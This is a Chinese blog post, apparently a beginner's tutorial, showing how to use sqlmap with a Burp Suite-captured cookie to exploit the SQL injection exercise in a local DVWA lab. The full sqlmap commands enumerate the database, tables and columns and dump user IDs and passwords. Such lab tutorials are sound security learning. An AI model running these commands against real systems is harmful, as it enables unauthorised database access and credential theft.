sqlmap基本用法

于 2015-05-14 10:59:32 发布
阅读量1.4k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: sql注入 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/WANGtesting/article/details/45717923
本文介绍如何使用sqlmap进行SQL注入攻击。通过配置burpsuite抓取链接和cookie,利用sqlmap发现并利用DVWA平台上的SQL注入漏洞。文章详细演示了获取数据库名称、表结构及内容的具体步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

sqlmap基本用法
最近在学sql注入用法哦sqlmap ,so 大概学习了下
需要的攻击如下
python
sqlmap
burpsuite
dvwa

怎么安装搭配环境省略

  1. dvwa中有个sql injection (首选等级选low)

  2. 用burpsuit抓链接以及cookie

    找到get方法,URL以及cookie

  3. 打开sqlmap
    添加cookie=””
    –current-db:显示当前数据库名称
    -u:后跟注入链接url
    sqlmap.py -u“http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”–cookie=”security=low; PHPSESSID=thjd3idiur5e1dce9tkogpait0” –current-db(显示当前数据库名)
    这里写图片描述

  4. 显示表
    sqlmap.py -u“http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”–cookie=”security=low; PHPSESSID=thjd3idiur5e1dce9tkogpait0” -D dvwa –tables
    这里写图片描述
    5.得到表的结构
    sqlmap.py -u“http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”–cookie=”security=low; PHPSESSID=thjd3idiur5e1dce9tkogpait0” -D dvwa -T guestbook –columns
    分别得到两张表
    guestbook表结构
    user表结构

  5. 得到表的内容,制定需要显示的字段内容
    sqlmap.py -u“http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”–cookie=”security=low; PHPSESSID=thjd3idiur5e1dce9tkogpait0” -D dvwa -T users -C user_id,password –dump
    这里写图片描述
    注入完成,sqlmap会陆续更新>< 新手多多指教
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值